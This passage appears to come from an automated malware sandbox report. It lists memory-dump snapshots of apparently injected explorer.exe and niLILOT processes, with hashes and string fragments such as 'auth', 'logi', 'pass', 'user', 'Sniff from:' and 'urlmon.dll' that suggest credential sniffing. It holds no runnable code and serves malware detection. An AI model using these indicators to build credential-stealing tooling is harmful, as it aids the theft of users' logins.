                                                                                                                                                                                        • API String ID: 0-1970020201
                                                                                                                                                                                        • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                        • Instruction ID: 867c9c75709f70b9d7dde536d92286a358d86a4a52f8a472b23095a33d92e66e
                                                                                                                                                                                        • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 36515CB0918B4D8BDB54EFA4C444AEEB7F1FF58300F404A2E949AE7254EF709541CB89
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                        • API String ID: 0-1610437797
                                                                                                                                                                                        • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                        • Instruction ID: 95821012f351c6838a27a3b71418e15e13bc172c7acf75e954e077f899265752
                                                                                                                                                                                        • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 09416038619B4C8BCBA5EF28D8457EA73E5FB98305F40462E989EC7240EF30D5458B82
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                        • API String ID: 0-1610437797
                                                                                                                                                                                        • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                        • Instruction ID: d87493edc56a8a11ae8989e5466416b9db20c67b82891481250c5538310ed64c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                        • Instruction Fuzzy Hash: B3418D31618B8D8BDB65EF2898457EAB7E9FBD9301F40462E988EC7240EF74D5058782
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                        • API String ID: 0-327345718
                                                                                                                                                                                        • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                        • Instruction ID: ee97680e06c17cf6e2ee3bce80fdfc67f2ce797f314397f289b52294e544d5d4
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C416F38A18E1D8FCB58EF68C0957ED77E6FB58308F40466AA80ED7250DA70D585CBC6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                        • API String ID: 0-327345718
                                                                                                                                                                                        • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                        • Instruction ID: 91f3c17d1c5793eea765200957461b993c44a8a0f0fe32563dc4a451eca9c1cc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 88416D30A18E0DCFDB54EF6984987EE77E5FB58300F40456AA84AD7240DE79D6818BC6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .dll$el32$h$kern
                                                                                                                                                                                        • API String ID: 0-4264704552
                                                                                                                                                                                        • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                        • Instruction ID: bafc5932aa9b09493157acdd4f886e40f9ac7d804fb74d7436a33d3695bfb185
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                        • Instruction Fuzzy Hash: BF418378608B4C4FD769DF2880843AABBE5FB98304F504A6E949EC3295DB70C545CB42
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .dll$el32$h$kern
                                                                                                                                                                                        • API String ID: 0-4264704552
                                                                                                                                                                                        • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                        • Instruction ID: ba324406bfc7d4acb1a8a6a7546ca767c4bd7145ab09171ed18cdbf48c825b99
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C41B370A08B4D8FD7A8DF2984883AABBE5FBE8340F104A6E949EC3255DF74D545CB41
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                        • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                        • Instruction ID: 46b40f35a68893429fc89323438744a6211bbb9e9a9642c02c3a0349a6998b5e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                        • Instruction Fuzzy Hash: C031F23951CB985FC71AEB29C084AEAB7D5FB84300F50491EE49BC7295EE31A589CF43
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                        • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                        • Instruction ID: 3f5a61bb30d046d04c638038728ab3ef8efa46199b87f4cd126b201952663fe3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                        • Instruction Fuzzy Hash: D131283160CB885FD71AEB28C8886DABBD4FB84300F504D6EE49BC7255EE35A549CB43
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                        • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                        • Instruction ID: 8d1e567402cd81c9d43999f6312f49013e9288dfcd9fa8e49fb8b2ab1bc19e40
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 40312639408B585FC319DB28C484AEAB3D5FB94300F40491EE49BC3285EF30E589CE43
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                        • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                        • Instruction ID: eb3262c876b50523d146e3121b7f16ff3a4e0842afc9b38afbf0fedb69743405
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E31D47160CB48AFD719EB28C8886EAB7D4FB94300F504D2EE49BC7255EE74E506CA43
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                        • API String ID: 0-3136806129
                                                                                                                                                                                        • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                        • Instruction ID: 30e0e1e024f1708d1801e36ada6e72d48366158e11afb6bb12274f92a805ee12
                                                                                                                                                                                        • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                        • Instruction Fuzzy Hash: C6319038118B184FDB84EF298494BAAB7E6FB94300F84552D984EC7255DF30C945CB93
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                        • API String ID: 0-3136806129
                                                                                                                                                                                        • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                        • Instruction ID: 4b6c5db3479152368ec7aec1a9841dba1343032397987834d20800d57c117570
                                                                                                                                                                                        • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                        • Instruction Fuzzy Hash: C3316B30618B498FDB84FF298898BAAB7E1FB98300F94467D944ECB264DF74C605C752
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                        • API String ID: 0-3136806129
                                                                                                                                                                                        • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                        • Instruction ID: ca9fe23e41877574f5978db02d3d067ca613907334f5824671012dfe5b7c4330
                                                                                                                                                                                        • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B318F38118B184FCB84EF688494BAAB7E6FF98300F84562D984ECB255DF30C945CB93
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                        • API String ID: 0-3136806129
                                                                                                                                                                                        • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                        • Instruction ID: b8e101cfc20754fa893720bd15ec0c5abfef8b47fd72c387dc7141657aba95b7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 45317C30618B098FDB84EF298898BAAB7E1FB98300F94467D944ECB264DF34C505C742
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                        • API String ID: 0-319646191
                                                                                                                                                                                        • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                        • Instruction ID: ed9e7b02c351bd335426c0b47efdcfd45364dcbf41a1750abf223235a50cdfad
                                                                                                                                                                                        • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5431D435614A1C8BCB05EFA9C8847EEB7E1FB58315F40022AD44ED7240DF788689CB86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                        • API String ID: 0-319646191
                                                                                                                                                                                        • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                        • Instruction ID: dff3814835a3856182d30945b35c8036fb7c8987d7ba5f991702bf79b61a4625
                                                                                                                                                                                        • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                        • Instruction Fuzzy Hash: C531D131B14A0D8BCF04EFA8C8887EDBBE1FB58205F40426ED45ED7240DE788645C789
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                        • API String ID: 0-319646191
                                                                                                                                                                                        • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                        • Instruction ID: 7f4d054d9f3f0beb1fc2fe7dd129aa10026b0c718ca22280f834228b2f25c684
                                                                                                                                                                                        • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A21D774610A1C8BCB05EFA9C8847EDBBF5FF58315F40421AD45AD7240DF748649CB86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                        • API String ID: 0-319646191
                                                                                                                                                                                        • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                        • Instruction ID: 8687c3993c1fc11d8e1c5e46f692a4590b45fc1c8a745777ddb10026608c7df2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5521CE30B14A0D8ACF05EFA9C8987EDBBA1FF58205F40426ED45AD7240DF788605CB8A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .$l$l$t
                                                                                                                                                                                        • API String ID: 0-168566397
                                                                                                                                                                                        • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                        • Instruction ID: 86e290c26fec57fb9656aa72e7386fece99e25e321c36ba85f6b8d077995160f
                                                                                                                                                                                        • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A218D78A24A1D9FDB08EFA8D0447AEBAF1FF58314F50462ED009D3600DB749595CB85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .$l$l$t
                                                                                                                                                                                        • API String ID: 0-168566397
                                                                                                                                                                                        • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                        • Instruction ID: dfa99d42928273872420c9dbab8d5cf03eff56c707aed10cce880aaba1c78c4c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                        • Instruction Fuzzy Hash: A8217F78A24A1D9BDB08EFA8D4447EDBBF1FF58314F50462DD009D3600DB749595CB85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .$l$l$t
                                                                                                                                                                                        • API String ID: 0-168566397
                                                                                                                                                                                        • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                        • Instruction ID: 3c925e115cff60c1c415c4e01eb60e69cc785337714b01c499139437fa69b72f
                                                                                                                                                                                        • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C217774A24A0E9BDB08EFA8D4587EEBAF1FB58300F50466ED409E3610DB789591CB84
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .$l$l$t
                                                                                                                                                                                        • API String ID: 0-168566397
                                                                                                                                                                                        • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                        • Instruction ID: beabcabfa2dfa5b5b1390f5a90a0079e6ec800d55af0d5a3dfe83ec3ddde0a0a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                        • Instruction Fuzzy Hash: CC218974A24A0E9BDB08EFA8D4587EEBBF1FB18300F50466ED409E3600DB789591CB84
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: auth$logi$pass$user
                                                                                                                                                                                        • API String ID: 0-2393853802
                                                                                                                                                                                        • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                        • Instruction ID: 79b124c835cc77d049d094903674dde2b87757f0533362148de1481b7490bb72
                                                                                                                                                                                        • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F21C034614B0D8BCB05DF9D98807EEB7E2FF88344F004619E80AEB248D7B0D9598BC2
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: auth$logi$pass$user
                                                                                                                                                                                        • API String ID: 0-2393853802
                                                                                                                                                                                        • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                        • Instruction ID: 45e618c1d52f98267b654e5464cc3f8de7f1872edb94762ac3e3912df883300e
                                                                                                                                                                                        • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                        • Instruction Fuzzy Hash: E721CD70624B0D8BCF05DF9998956EEBBE1FF88344F004669E40AEB254D7B4D914CBD2
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000019.00000002.490954261.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_460000_niLILOT.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 8!p
                                                                                                                                                                                        • API String ID: 0-2808226621
                                                                                                                                                                                        • Opcode ID: e02b8a4a94bc680c7466cfe4a33363ce5eb45d39b1a9bfb6874069705c2f9230
                                                                                                                                                                                        • Instruction ID: ef09a718317f48577b8577cd7f6c1aebd7d3804a32169b38962964760451b442
                                                                                                                                                                                        • Opcode Fuzzy Hash: e02b8a4a94bc680c7466cfe4a33363ce5eb45d39b1a9bfb6874069705c2f9230
                                                                                                                                                                                        • Instruction Fuzzy Hash: 75F020342221108FD302E7B8E910B1A77B1AF8A240B0184DBE044CF3B2EA28AD048F92
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000019.00000002.490954261.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_460000_niLILOT.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 8!p
                                                                                                                                                                                        • API String ID: 0-2808226621
                                                                                                                                                                                        • Opcode ID: 10de529d1718ac80fe687e657018d1a28caec62a8cee5613cc9eb9ee13e692d5
                                                                                                                                                                                        • Instruction ID: 27d4e99f6574adf8b055a54032ab67b544e1491e1ddee57ecd5f2a8a31d8fef8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 10de529d1718ac80fe687e657018d1a28caec62a8cee5613cc9eb9ee13e692d5
                                                                                                                                                                                        • Instruction Fuzzy Hash: 19E09A352215109FD714FBA8E804B2E73E9AB89240B0181AAE1058B366DB39EC008F81
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000019.00000002.490954261.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_460000_niLILOT.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 8e361008b58e1acfc4d64a1b93e9873eea3becb027216bdbf7fa2ed6d39c0834
                                                                                                                                                                                        • Instruction ID: 05c0beb6c251bb45be979630e2fde81f7413885fcc6da29eeb3d6cc5e51ff994
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e361008b58e1acfc4d64a1b93e9873eea3becb027216bdbf7fa2ed6d39c0834
